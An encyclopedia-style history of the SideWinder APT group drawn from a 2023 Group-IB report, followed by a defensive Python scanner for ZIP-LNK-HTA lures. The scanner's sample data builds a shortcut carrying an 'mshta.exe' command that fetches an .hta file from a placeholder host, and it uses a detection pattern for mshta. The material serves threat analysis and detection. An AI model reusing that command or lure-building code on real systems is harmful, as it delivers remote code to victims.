History
2023: Group-IB spoke in detail about SideWinder
In February 2023, the Russian technology company Group-IB published a detailed report on the APT group SideWinder, which, according to its researchers, is sponsored by the Indian authorities. The group's main targets are state bodies, military organizations and the energy sector.
The hacker group SideWinder is also known by other names: Rattlesnake, Hardcore Nationalist, RAZOR TIGER, T-APT-04 and APT-C-17. Although SideWinder has been seen attacking government, military and financial institutions in Afghanistan, Nepal, Sri Lanka, Bhutan, Myanmar, the Philippines, Bangladesh, Singapore and China, its main target is Pakistan. Since at least 2019, SideWinder has shown particular interest in military facilities and targets in Pakistan. Local authorities have even issued an alert warning of the threat from SideWinder and how to protect against it.
As its main attack vector, the group uses phishing links in emails or posts that mimic legitimate alerts and services of various government agencies and organizations in Pakistan. The group has also been seen cloning government websites to harvest user credentials; one example is a phishing authentication page imitating one of the state portals of Sri Lanka.
SideWinder began using an anti-bot script to filter potential victims: the attackers are interested only in users from Pakistan. The group also relies on a familiar delivery technique, sending a ZIP archive that contains an LNK shortcut file, which in turn downloads an HTA file from a remote server.
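As an added illustration of how a defender can triage the ZIP-to-LNK-to-HTA delivery chain described above (example code written for this page, not Group-IB's tooling), the following Python scanner unpacks an archive in memory and flags any .lnk member whose embedded strings reference mshta or a remote .hta URL. The archive, the shortcut bytes and the hostname example.invalid are constructed sample data.

```python
import io
import re
import zipfile

# Shell Link header: HeaderSize 0x4C followed by the LinkCLSID 00021401-0000-0000-C000-000000000046.
LNK_HEADER = b"\x4c\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
# Heuristics for the HTA stage: the mshta host process or a URL that ends in .hta.
HTA_RE = re.compile(r"mshta(?:\.exe)?|https?://[^\s\"']+\.hta\b", re.IGNORECASE)


def scan_zip_for_lnk_hta(zip_bytes):
    """Return one finding per .lnk member; 'suspicious' is set when HTA indicators are present."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            data = zf.read(info)
            # Real LNK arguments are stored as UTF-16LE; decode both ways so ASCII strings are seen too.
            text = data.decode("utf-16-le", errors="ignore") + "\n" + data.decode("latin-1")
            hits = sorted({m.group(0).lower() for m in HTA_RE.finditer(text)})
            findings.append({
                "member": info.filename,
                "valid_lnk_header": data.startswith(LNK_HEADER),
                "hta_indicators": hits,
                "suspicious": bool(hits),
            })
    return findings


def build_sample_zip():
    """Constructed sample: a document-looking archive carrying a shortcut that launches mshta."""
    args = "/c mshta.exe http://example.invalid/update.hta".encode("utf-16-le")
    fake_lnk = LNK_HEADER + b"\x00" * 56 + args  # pad header to 0x4C bytes, then the argument string
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Advisory_2023.pdf.lnk", fake_lnk)
        zf.writestr("readme.txt", b"harmless text")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_zip_for_lnk_hta(build_sample_zip()):
        print(finding)
```

The check is a triage heuristic: a shortcut that passes it still needs the full LNK target and argument fields parsed before it is treated as the confirmed first stage.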
According to Group-IB, in 2021 alone the hackers attempted to attack dozens of government and military organizations in Afghanistan, Bhutan, Myanmar, Nepal and Sri Lanka. In this campaign the attackers used Telegram to retrieve information from compromised networks.
The researchers also discovered two phishing projects that mimic cryptocurrency companies. SideWinder's growing interest in cryptocurrency may be linked to attempts to regulate the crypto market in India.[1]